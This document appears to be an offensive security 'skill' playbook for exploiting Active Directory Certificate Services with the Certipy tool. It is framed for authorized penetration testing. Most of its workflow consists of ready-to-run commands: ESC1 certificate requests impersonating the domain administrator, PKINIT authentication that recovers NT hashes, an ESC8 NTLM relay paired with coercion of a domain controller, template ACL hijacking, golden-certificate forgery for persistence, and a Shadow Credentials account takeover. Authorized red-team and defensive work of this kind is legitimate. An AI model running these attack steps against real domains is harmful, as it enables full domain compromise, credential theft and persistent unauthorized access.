Exploiting AD CS with Certipy

Legal Notice: This skill is for authorized security testing and educational purposes only. Active Directory Certificate Services attacks can result in full domain compromise. Run these techniques only against systems you own or have explicit written authorization to test. Unauthorized use is illegal under computer fraud statutes.

Overview

Active Directory Certificate Services (AD CS) is Microsoft's public-key infrastructure role used to issue certificates for authentication, encryption, and signing inside a Windows domain. SpecterOps researchers Will Schroeder and Lee Christensen documented a family of privilege-escalation primitives in their 2021 whitepaper Certified Pre-Owned, naming them ESC1 through ESC8. The community has since extended the catalog through ESC16. Because a certificate that maps to a privileged principal can be used for PKINIT Kerberos authentication, an attacker who obtains such a certificate can authenticate as a Domain Admin or Domain Controller without ever knowing the password — and the certificate remains valid even after a password reset.

Certipy (package certipy-ad, maintained by Oliver Lyak / ly4k) is the de-facto offensive toolkit for AD CS. It is a pure-Python tool that enumerates certificate authorities and templates over LDAP/RPC, requests and forges certificates, performs PKINIT/Schannel authentication, runs Shadow Credentials attacks, and relays coerced NTLM authentication into AD CS HTTP and RPC enrollment endpoints. Certipy supports detection and exploitation across the full ESC1-ESC16 range, making it the primary tool for AD CS assessment. Source: ly4k/Certipy and SpecterOps "Certified Pre-Owned".

When to Use

• During internal penetration tests and red-team engagements where AD CS is in scope
• When a low-privileged domain foothold needs a path to Domain Admin / Domain Controller
• To validate that certificate template ACLs and CA configuration are hardened
• When testing detection coverage for certificate-based privilege escalation
• During purple-team exercises to generate ESC1/ESC8 telemetry for blue-team tuning

Prerequisites

• Authorized engagement scope that explicitly includes AD CS exploitation
• A foothold: valid domain credentials (password, NT hash, or Kerberos ticket) for any low-privileged user
• Network reachability to a Domain Controller (LDAP/389, LDAPS/636) and the CA host
• Python 3.10+ (Certipy 5.x requires Python 3.12+) and a Linux attack host
• Install Certipy:

  # Recommended isolated install
  pipx install certipy-ad
  # Or with pip
  pip install certipy-ad
  # Verify
  certipy --version
  

• For ESC8 relay you also need a coercion tool (Coercer/PetitPotam) and reachable victim machine accounts

Objectives

• Enumerate every CA, template, and enrollment endpoint in the forest
• Identify which ESC1-ESC16 misconfigurations are exploitable from the current principal
• Request a certificate impersonating a privileged target (ESC1 SAN abuse)
• Relay coerced authentication into AD CS web enrollment to obtain a DC certificate (ESC8)
• Authenticate with a forged/issued certificate to recover a TGT and NT hash
• Document each finding with evidence and remediation guidance

MITRE ATT&CK Mapping

Workflow

Step 1: Enumerate AD CS with certipy find

Collect CA and template configuration and flag vulnerable templates. find runs LDAP and RPC queries and produces JSON, a BloodHound-compatible ZIP, and a human-readable text report.

# Full enumeration, only enabled templates, hide built-in admin ACEs
certipy find \
    -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -text -enabled -hide-admins

# Output only templates Certipy considers vulnerable
certipy find \
    -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -vulnerable -stdout

# Authenticate with an NT hash instead of a password
certipy find -u 'attacker@corp.local' -hashes ':fc525c9683e8fe067095ba2ddc971889' \
    -dc-ip 10.0.0.100 -vulnerable -stdout

Review the [!] Vulnerabilities block in the output. Each finding is labeled ESC1...ESC16 with the affected template/CA name.

Step 2: Exploit ESC1 — Enrollee-Supplied Subject (SAN abuse)

ESC1 templates let a low-privileged enrollee specify an arbitrary Subject Alternative Name and include the Client Authentication EKU. Request a certificate for a privileged UPN and pin the target SID (Certipy auto-adds the SID extension to satisfy the post-May-2022 strong-mapping patch).

certipy req \
    -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -target 'CA.CORP.LOCAL' \
    -ca 'CORP-CA' -template 'VulnUserTemplate' \
    -upn 'administrator@corp.local' \
    -sid 'S-1-5-21-1111111111-2222222222-3333333333-500'
# -> saves administrator.pfx

Step 3: Authenticate with the certificate via certipy auth

Use the issued PFX to perform PKINIT, obtain a TGT, and recover the target's NT hash.

certipy auth -pfx administrator.pfx -dc-ip 10.0.0.100
# Output: a .ccache TGT and the recovered NT hash for administrator

If PKINIT is unavailable, fall back to Schannel/LDAP authentication:

certipy auth -pfx administrator.pfx -dc-ip 10.0.0.100 -ldap-shell

Step 4: Exploit ESC8 — NTLM relay to AD CS Web Enrollment

ESC8 abuses the AD CS web enrollment interface (/certsrv/) that accepts NTLM auth. Stand up Certipy's relay server targeting the CA's HTTP endpoint, then coerce a Domain Controller to authenticate to your relay (coercion covered in the Coercer skill).

# Terminal 1: relay coerced auth into web enrollment, request a DC cert
certipy relay -target 'http://CA.CORP.LOCAL' -template 'DomainController'

# Terminal 2: coerce DC1 to authenticate to the relay host (10.0.0.50)
coercer coerce -u 'attacker' -p 'Passw0rd!' -d corp.local \
    -t 10.0.0.10 -l 10.0.0.50

Certipy writes a dc.pfx. Authenticate as the DC machine account and DCSync:

certipy auth -pfx 'dc$.pfx' -dc-ip 10.0.0.100

Step 5: Exploit ESC4 — Template ACL hijack

If you hold write access over a template, temporarily reconfigure it into an ESC1-vulnerable state, exploit, then restore.

# Make the template vulnerable (save the original config first)
certipy template -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -template 'VulnTemplate' -write-default-configuration
# ... run Step 2 ESC1 request, then restore the saved configuration

Step 6: Forge a Golden Certificate (post-compromise persistence)

With access to the CA's private key (e.g., via backup), forge certificates for any principal offline.

# Extract the CA certificate and private key from a compromised CA
certipy ca -backup -u 'admin@corp.local' -hashes :<nthash> \
    -ca 'CORP-CA' -dc-ip 10.0.0.100

# Forge a certificate for any user using the CA key
certipy forge -ca-pfx 'CORP-CA.pfx' \
    -upn 'administrator@corp.local' \
    -subject 'CN=Administrator,CN=Users,DC=corp,DC=local'

Step 7: Shadow Credentials shortcut

If you have write access to a target's msDS-KeyCredentialLink, Certipy can take over the account end-to-end (see the dedicated Shadow Credentials skill).

certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'victim-dc$'

Tools and Resources

ESC Vulnerability Reference

Validation Criteria

• certipy find -vulnerable ran and produced a list of exploitable templates/CAs
• At least one ESC misconfiguration confirmed with a successful certipy req
• certipy auth returned a TGT and NT hash for the impersonated privileged account
• ESC8 relay (if in scope) yielded a Domain Controller certificate
• Any modified template (ESC4) was restored to its original configuration
• Each finding documented with command output, affected object, and remediation
• Issued certificates and PFX files securely handled and removed at engagement close